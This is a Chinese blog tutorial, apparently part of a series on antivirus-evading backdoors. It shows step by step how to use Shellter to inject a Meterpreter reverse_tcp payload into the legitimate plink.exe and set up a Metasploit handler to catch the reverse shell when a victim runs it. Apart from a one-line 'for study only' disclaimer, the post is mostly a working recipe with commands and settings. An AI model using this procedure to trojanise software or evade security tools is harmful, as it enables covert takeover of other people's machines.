• 免杀后门(四)之shellter注入绕过


    文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用

    Shellter 是一款动态 shellcode 注入工具。利用它,我们可以将shell注入到其他的可执行程序上,从而躲避安全工具的检查。下面我们来看看,如何使用该工具。

    首先我们先来进行安装:

    apt-get install shellter

    20161010115540

    安装过程非常简单,在正式使用前我们先拷贝一个二进制文件到根目录,以方便我们后续进行注入使用:

    cp /usr/share/windows-binaries/plink.exe .

    20161010122132

    现在我们启动 shellter ,我们可以看到以下界面:

    20161010115849

    我们选择 a append 增加代码段,并选择我们要进行注入的二进制文件 plink.exe

    20161010122301

    在经过一番复杂的编码加密注入后,下面要求我们选择一种 payload 或 自定义使用 payload ,这里我选择 L 并选择列表中的 1 
    set LHOST :192.168.15.135
    set LPORT :4444

    20161010122709

    当我们回车后,shellter 就会自动帮我们生成 shellcode 并自动退出程序。我们在当前目录下 使用 ls -l 命令进行查看,可以看到 plink.exe 已被成功注入:

    20161010123319

    接着我们在 kali 上启动 MSF,配置反弹会话的 handler :

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set lhost 192.168.15.135

    set port 4444

    exploit

    20161010124206

    此时只要当目标成功运行,经我们注入的 shellcode 程序,我们就能取得目标的 shell !

    20161010124330

  • 相关阅读:
    Java Web之Servlet入门篇(二)
    『一本通』KMP算法
    P2865 [USACO06NOV]Roadblocks (次短路)
    字符串算法
    『一本通』哈希和哈希表
    『一本通』广搜的优化技巧
    [SCOI2011]糖果(差分约束系统)
    『一本通』二分与三分
    『一本通』贪心
    『P1122』最大子树和
  • 原文地址:https://www.cnblogs.com/nul1/p/9794796.html
Copyright © 2020-2023  润新知